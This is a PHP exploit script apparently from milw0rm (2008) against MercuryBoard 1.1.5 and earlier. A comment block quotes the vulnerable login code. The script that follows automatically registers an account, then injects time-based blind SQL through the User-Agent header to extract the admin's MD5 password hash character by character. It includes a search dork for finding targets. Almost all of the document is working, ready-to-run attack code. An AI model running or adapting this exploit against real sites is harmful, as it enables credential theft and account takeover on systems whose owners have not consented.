<?php
/*
--------------------------------------------------------------------
MercuryBoard <= 1.1.5 (login.php) Remote Blind SQL Injection Exploit
--------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.mercuryboard.com/
dork.....: "Powered by MercuryBoard"
details..: SLEEP() function was added in MySQL 5.0.12, so this PoC works depending on the version of MySQL
[-] do_login() function vulnerable to SQL injection in /func/login.php
52. function do_login()
53. {
54. $this->set_title($this->lang->login_header);
55. $this->tree($this->lang->login_header);
56.
57. //print "agent: $this->agent\n";
58.
59. if (!isset($this->post['submit'])) {
60. $request_uri = $this->get_uri();
61.
62. if (substr($request_uri, -8) == 'register') {
63. $request_uri = $this->self;
64. }
65.
66. return eval($this->template('LOGIN_MAIN'));
67. } else {
68. $username = str_replace('\\', '\', $this->format(stripslashes($this->post['user']), FORMAT_HTMLCHARS | FORMAT_CENSOR));
69.
70. $data = $this->db->fetch("SELECT user_id, user_password FROM {$this->pre}users WHERE REPLACE(LOWER(user_name), ' ', '')='" . str_replace(' ', '', strtolower($username)) . '\' AND user_id != ' . USER_GUEST_UID . ' LIMIT 1');
71. $pass = $data['user_password'];
72. $user = $data['user_id'];
73.
74. $this->post['pass'] = str_replace('$', '', $this->post['pass']);
75. $this->post['pass'] = md5($this->post['pass']);
76.
77. if ($this->post['pass'] == $pass) {
78. if (!setcookie($this->sets['cookie_prefix'] . 'user', $user, $this->time + $this->sets['logintime'], $this->sets['cookie_path'])
79. || !setcookie($this->sets['cookie_prefix'] . 'pass', $pass, $this->time + $this->sets['logintime'], $this->sets['cookie_path'])) {
80. return $this->message($this->lang->login_header, $this->lang->login_cookies);
81. }
82.
83. // Delete guest entry
84. $this->db->query("DELETE FROM {$this->pre}active WHERE active_ip='$this->ip' AND active_user_agent='$this->agent'"); <=======
85.
86. return $this->message($this->lang->login_header, $this->lang->login_logged, $this->lang->main_continue, str_replace('&', '&', $this->post['request_uri']), $this->post['request_uri']);
$this->agent (User-Agent header) isn't properly sanitised, so an attacker could be inject arbitrary SQL code in a subquery into the query at line 84
[-] Possible bug fix in /global.php
66. function mercuryboard()
67. {
68. $this->time = time();
69. $this->query = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : null;
70. $this->ip = $_SERVER['REMOTE_ADDR'];
71. $this->agent = isset($_SERVER['HTTP_USER_AGENT']) ? addslashes($_SERVER['HTTP_USER_AGENT']) : null; <=======
72. $this->self = $_SERVER['PHP_SELF'];
73. $this->server = $_SERVER;
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
function getdelay($query)
{
global $host, $path, $username, $password;
$data = "user={$username}&pass={$password}&submit=1&request_uri=foo";
$packet = "POST {$path}index.php?a=login HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "User-Agent: {$query}\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Connection: close\r\n\r\n";
$packet.= $data;
$start = getmicrotime()*1000;
http_send($host, $packet);
$end = getmicrotime()*1000;
return ($end - $start);
}
function getusername($uid)
{
global $host, $path;
$packet = "GET {$path}index.php?a=profile&w={$uid} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Connection: close\r\n\r\n";
preg_match("/Viewing Profile: (.*)<\/td>/i", http_send($host, $packet), $split);
return $split[1];
}
function register()
{
global $host, $path, $username, $password;
$data = "desuser={$username}&email=foo@null.com&passA={$password}&passB={$password}&submit=1";
$packet = "POST {$path}index.php?a=register HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Connection: close\r\n\r\n";
$packet.= $data;
http_send($host, $packet);
}
function login()
{
global $host, $path, $username, $password;
$data = "user={$username}&pass={$password}&submit=1&request_uri=foo";
$packet = "POST {$path}index.php?a=login HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Connection: close\r\n\r\n";
$packet.= $data;
$pattern = "/pass=".md5($password)."/";
return preg_match($pattern, http_send($host, $packet));
}
print "\n+------------------------------------------------------------------+";
print "\n| MercuryBoard <= 1.1.5 Remote Blind SQL Injection Exploit by EgiX |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path [options]\n";
print "\nhost.......: target server (ip/hostname)";
print "\npath.......: path to MercuryBoard directory (example: / or /mercury/)\n";
print "\n-s seconds.: number of seconds for SLEEP() (dafault: 5)";
print "\n-u uid.....: user id (default: 2 - admin)";
print "\n-t prefix..: table's prefix (default: mb)\n";
print "\nExample....: php $argv[0] localhost /mercury/ -s 1";
print "\nExample....: php $argv[0] localhost / -u 3 -t my_prefix\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$username = "pr00f_0f";
$password = "_c0nc3pt";
$opt = array("-s", "-u", "-t");
$md5 = "";
$count = "5";
$uid = "2";
$prefix = "mb";
for ($i = 3; $i < $argc; $i++)
{
if ($argv[$i] == "-s") if (isset($argv[$i+1]) && !in_array($argv[$i+1], $opt)) $count = $argv[++$i];
if ($argv[$i] == "-u") if (isset($argv[$i+1]) && !in_array($argv[$i+1], $opt)) $uid = $argv[++$i];
if ($argv[$i] == "-t") if (isset($argv[$i+1]) && !in_array($argv[$i+1], $opt)) $prefix = $argv[++$i];
}
if (!login())
{
print "\n[-] Trying to register with username '{$username}' and password '{$password}'\n";
register();
if (!login()) die("\n[-] Login failed!\n");
}
$user = getusername($uid);
print "\n[-] Username: {$user}";
$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$index = 1; $md5 = "";
print "\n[-] MD5 Hash: ";
while (!strpos($md5, chr(0)))
{
for ($i = 0, $n = count($hash); $i <= $n; $i++)
{
if ($i == $n) die("\n\n[-] Exploit failed...\n");
$sql = "'OR(SELECT IF(ORD(SUBSTR(user_password,{$index},1))={$hash[$i]},SLEEP({$count}),1) FROM {$prefix}_users WHERE user_id={$uid})#";
if (getdelay($sql) >= ($count * 1000)) { $md5 .= chr($hash[$i]); print chr($hash[$i]); break; }
}
$index++;
}
if (!eregi("[0-9,a-f]{32}", $md5)) print "\n\n[-] Invalid MD5 hash...\n";
else print "\n\n[-] Successfull!\n";
?>
# milw0rm.com [2008-05-19]